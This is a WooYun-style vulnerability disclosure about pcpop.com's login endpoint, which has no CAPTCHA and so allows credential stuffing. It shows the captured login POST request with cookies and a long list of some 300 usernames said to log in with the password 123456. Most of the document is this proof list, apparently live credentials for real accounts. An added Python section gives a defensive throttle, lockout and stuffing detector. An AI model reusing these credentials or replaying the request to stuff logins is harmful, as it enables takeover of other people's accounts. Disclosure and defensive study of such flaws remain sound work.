
Vulnerability summary

Defect ID: wooyun-2014-089255

Title: 泡泡网 (pcpop.com) login interface has no CAPTCHA, enabling credential stuffing

Vendor: 泡泡网

Author: 花心h

Submitted: 2014-12-30 09:54

Fixed: 2015-01-04 09:56

Disclosed: 2015-01-04 09:56

Type: Design flaw / logic error

Severity: High

Self-assessed rank: 10

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-12-30: Details sent to the vendor; awaiting the vendor's response
2015-01-04: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

1

Detailed description:

Login endpoint: http://uc.pcpop.com/uc_login.php?returnurl=http://www.pcpop.com
Request sent:
POST /suc/action/login.php?action=loginbyusername&t=1419400988155 HTTP/1.1
Host: uc.pcpop.com
Proxy-Connection: keep-alive
Cache-Control: no-cache
Origin: http://uc.pcpop.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uc.pcpop.com/uc_login.php?returnurl=http%3A%2F%2Fwww.pcpop.com%2F%3F%26r%3D0.45516037568449974
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __pta=1145578403.1419136160.1419136160.1419400978.1; __pts=83578497; __ptb=83578497; Hm_lvt_4875cc4ab76a7d7c11c93855dfbdfcdd=1419136159,1419400979; Hm_lpvt_4875cc4ab76a7d7c11c93855dfbdfcdd=1419400979; __utmt=1; __utma=61410867.11036304.1419136159.1419136159.1419400979.2; __utmb=61410867.1.10.1419400979; __utmc=61410867; __utmz=61410867.1419400979.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E6%B3%A1%E6%B3%A1%E7%BD%91
Content-Length: 25
loginname=111&password=123456

Proof of vulnerability:

[Screenshot: 泡泡网.png]


jocelyne 123456
mojiezuo 123456
lijiejie 123456
annetta 123456
decayed 123456
gardens 123456
ingemar 123456
panning 123456
roobbie 123456
susanne 123456
qwerty12 123456
lifting 123456
linguet 123456
looksee 123456
majerle 123456
nikolas 123456
philipa 123456
brulee 123456
eyeing 123456
geneen 123456
meteor 123456
teenie 123456
romain 123456
sarina 123456
wangjy 123456
belick 123456
bibble 123456
binder 123456
carley 123456
chitak 123456
decnet 123456
fausto 123456
floral 123456
florry 123456
grayed 123456
huther 123456
kalina 123456
maoris 123456
niding 123456
pasang 123456
passer 123456
riping 123456
shikar 123456
snivel 123456
aneurin 123456
fordham 123456
goldwin 123456
kaisers 123456
culver 123456
meagan 123456
123175 123456
197510 123456
310227 123456
328117 123456
441925 123456
750218 123456
771224 123456
781115 123456
781231 123456
828828 123456
830820 123456
braves 123456
andres 123456
aristo 123456
lovable 123456
massine 123456
pizzazz 123456
adieu 123456
buyer 123456
accel 123456
adala 123456
adali 123456
addda 123456
adina 123456
agama 123456
aimil 123456
alani 123456
aliza 123456
amate 123456
angra 123456
apace 123456
arian 123456
ariki 123456
asine 123456
assen 123456
atila 123456
badan 123456
bange 123456
basti 123456
betas 123456
bilge 123456
cacan 123456
cader 123456
caius 123456
caoba 123456
caulk 123456
cheme 123456
cicer 123456
cloes 123456
cloze 123456
cocas 123456
cocke 123456
cocle 123456
comfy 123456
conga 123456
coven 123456
crowe 123456
cyane 123456
debra 123456
denys 123456
derte 123456
derth 123456
dibai 123456
diety 123456
divan 123456
dotes 123456
duval 123456
eaton 123456
elsah 123456
enola 123456
ethyl 123456
fanga 123456
farcy 123456
flirt 123456
forli 123456
fream 123456
galla 123456
gally 123456
geest 123456
grape 123456
grego 123456
grobe 123456
grote 123456
guage 123456
guiba 123456
halli 123456
hamal 123456
hemol 123456
herbe 123456
hider 123456
houss 123456
hupeh 123456
infin 123456
isbel 123456
jalee 123456
krone 123456
lesli 123456
looks 123456
patri 123456
saxon 123456
shoji 123456
sling 123456
sposi 123456
halli 123456
tessy 123456
thang 123456
unger 123456
warty 123456
adina 123456
aimil 123456
aliza 123456
unname 123456
benoit 123456
debell 123456
disuse 123456
nasion 123456
wilder 123456
lesli 123456
maire 123456
saxon 123456
tessy 123456
123698 123456
52330 123456
myths 123456
benoit 123456
bedlar 123456
bosom 123456
bouet 123456
cadee 123456
cares 123456
lauer 123456
liken 123456
lubes 123456
madia 123456
monon 123456
needs 123456
geer 123456
halm 123456
hayz 123456
irma 123456
jule 123456
mals 123456
nixy 123456
pari 123456
swim 123456
tats 123456
tens 123456
wana 123456
weri 123456
wist 123456
tenne 123456
abra 123456
aivr 123456
alys 123456
amil 123456
aute 123456
babs 123456
ccta 123456
coll 123456
dams 123456
dato 123456
dogy 123456
oceanstar 123456
1349 123456
6376 123456
8732 123456
8736 123456
wrt 123456
guri 123456
jarp 123456
jiti 123456
sdrs 123456
sldc 123456
stk 123456
tpk 123456
angl 123456
dase 123456
riccardo 123456
1223 123456
1425 123456
1201 123456
19800402 123456
19970701 123456
opqw 123456
teachers 123456
ingemar 123456
adp 123456
nob 123456
annetta 123456
lantana 123456
algeria 123456
anatman 123456
bandido 123456
blocker 123456
bobstay 123456
bootman 123456
bravely 123456
cabezon 123456
castell 123456
catania 123456
chaille 123456
chanche 123456
chuckle 123456
dolours 123456
dominik 123456
doughty 123456
ducking 123456
edgardo 123456
forland 123456
frabbit 123456
funding 123456
gaiting 123456
gualala 123456
harking 123456
helming 123456
joining 123456
juggins 123456
klipdas 123456
knuckly 123456
landers 123456
loveday 123456

Remediation:

You know what to do.
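The report leaves the fix implicit: the login.php handler accepts an unlimited stream of loginname/password guesses, so one source can walk a wordlist of accounts against the single password 123456, as the proof list shows. The block below is an added example, not code from the report or from 泡泡网, of what the server side of that endpoint should do: a sliding-window throttle that demands a CAPTCHA after repeated failures from one client IP and temporarily locks an account after repeated failures against it, plus detection over the login audit log that flags a source trying many distinct accounts in one window. The field names loginname and password come from the captured request; the thresholds, window size, account store and IP addresses are constructed assumptions.

```python
# Added example (not from the original report): defensive handling for a login
# endpoint that, like the one in the report, accepts unlimited
# loginname/password guesses. The field names come from the captured request;
# thresholds, window size, IPs and accounts below are constructed assumptions.
from collections import defaultdict, deque


class LoginThrottle:
    """Per-IP and per-account failure counters over a sliding window.

    Policy (assumed): after max_ip_failures failed logins from one client IP
    inside `window` seconds the endpoint demands a CAPTCHA; after
    max_user_failures against one account, that account is temporarily locked.
    """

    def __init__(self, window=300, max_ip_failures=10, max_user_failures=5):
        self.window = window
        self.max_ip_failures = max_ip_failures
        self.max_user_failures = max_user_failures
        self.ip_failures = defaultdict(deque)
        self.user_failures = defaultdict(deque)

    def _prune(self, dq, now):
        # Drop failures older than the window so counters slide instead of growing.
        while dq and now - dq[0] > self.window:
            dq.popleft()

    def decide(self, ip, loginname, now):
        """Decision to take BEFORE the password is even checked."""
        self._prune(self.ip_failures[ip], now)
        self._prune(self.user_failures[loginname], now)
        if len(self.user_failures[loginname]) >= self.max_user_failures:
            return "lock"
        if len(self.ip_failures[ip]) >= self.max_ip_failures:
            return "captcha"
        return "allow"

    def record_failure(self, ip, loginname, now):
        self.ip_failures[ip].append(now)
        self.user_failures[loginname].append(now)


# Constructed account store; the weak password mirrors the report's proof list.
USERS = {"jocelyne": "123456", "mojiezuo": "123456", "alice": "c0rrect-h0rse"}


def handle_login(throttle, attempts, ip, loginname, password, now):
    """Process one POST to login.php, append an audit record, return the outcome."""
    outcome = throttle.decide(ip, loginname, now)
    if outcome == "allow":
        if USERS.get(loginname) == password:
            outcome = "success"
        else:
            throttle.record_failure(ip, loginname, now)
            outcome = "fail"
    attempts.append((ip, loginname, outcome, now))
    return outcome


def stuffing_sources(attempts, window=300, min_users=8):
    """Detection over the audit log: a source IP that tries many DISTINCT
    accounts inside one window is the credential-stuffing signature, whether
    or not the guesses succeed. Returns {ip: max distinct accounts in a window}."""
    by_ip = defaultdict(list)
    for ip, loginname, _outcome, ts in attempts:
        by_ip[ip].append((ts, loginname))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (ts, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - ts <= window}
            if len(users) >= min_users:
                flagged[ip] = max(flagged.get(ip, 0), len(users))
    return flagged


def run_demo():
    throttle = LoginThrottle()
    attempts = []
    attacker, victim_ip = "203.0.113.7", "198.51.100.5"  # constructed IPs
    # Stuffing run: one IP, one password, a different account every second.
    guesses = ["jocelyne"] + ["user%02d" % i for i in range(1, 11)] + ["mojiezuo"]
    stuffing = [handle_login(throttle, attempts, attacker, u, "123456", t)
                for t, u in enumerate(guesses)]
    # A legitimate login from elsewhere during the same window is unaffected.
    legit = handle_login(throttle, attempts, victim_ip, "alice", "c0rrect-h0rse", 5)
    # Repeated wrong guesses against one account trip the per-account lock.
    for t in range(5):
        handle_login(throttle, attempts, victim_ip, "alice", "wrong%d" % t, 100 + t)
    locked = throttle.decide(victim_ip, "alice", 106)
    return {"stuffing": stuffing, "legit": legit, "locked": locked,
            "flagged": stuffing_sources(attempts)}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

In the demo the first guess with 123456 still succeeds, which is why the throttle alone is not the whole fix: the second weak-password account is only protected because the run hits the CAPTCHA gate after ten failures, and the audit-log detector flags the source for having tried twelve distinct accounts inside one window. Rejecting passwords like 123456 at registration closes the remaining gap.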

Copyright notice: when reposting, credit the source 花心h@乌云


Vulnerability response

Vendor response:

Severity: No impact; vendor ignored

Ignored on: 2015-01-04 09:56

Vendor reply:

Latest status:

None yet